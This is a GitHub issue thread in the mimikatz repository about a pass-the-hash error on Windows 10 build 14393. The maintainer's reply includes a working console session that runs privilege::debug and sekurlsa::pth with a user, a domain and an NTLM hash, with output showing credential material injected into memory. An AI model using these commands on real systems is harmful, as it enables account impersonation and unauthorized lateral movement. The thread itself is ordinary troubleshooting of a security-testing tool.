### ISSUE TITLE
PTH Issue with Windows 10 / 1607

### ISSUE THREAD

**Issue by cfalta** [gentilkiwi/mimikatz#57]
Hello Benjamin,

I get the error "kull_m_memory_copy (0x00000005)" when trying to use PTH with Windows 10 Build 10.0.14393 (Windows 10 Enterprise). Credential dumping works as usual.
I attached the log file, thanks for any advice you can give.
[mimi.txt](https://github.com/gentilkiwi/mimikatz/files/416942/mimi.txt)

Best regards,

Christoph

**Comment by gentilkiwi** [comment]
Are you sure you use latest `mimikatz` release? ( https://github.com/gentilkiwi/mimikatz/releases/latest )
And, do not forget: https://github.com/gentilkiwi/mimikatz/wiki/howto-~-open-an-issue
On my side:
```
mimikatz 2.1 (arch x64)
Windows NT 10.0 build 14393 (arch x64)
msvc 150030729 207

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::pth /user:admin /domain:parent.local /ntlm:cc36cf7a8514893efccd332446158b1a
user    : admin
domain  : parent.local
program : cmd.exe
impers. : no
NTLM    : cc36cf7a8514893efccd332446158b1a
  |  PID  4732
  |  TID  2288
  |  LUID 0 ; 848488 (00000000:000cf268)
  \_ msv1_0   - data copy @ 00000125275C54A0 : OK !
  \_ kerberos - data copy @ 0000012526DC42B8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace -> null
```

**Comment by cfalta** [comment]
I use the latest mimikatz release, however the issue seems to occur only on one of my machines so the problem seems to be on my side.
I don't know what's the reason yet but I'm still investigating.

Thanks and best regards, Christoph

**Comment by gentilkiwi** [comment]
Maybe a security/option product ;)
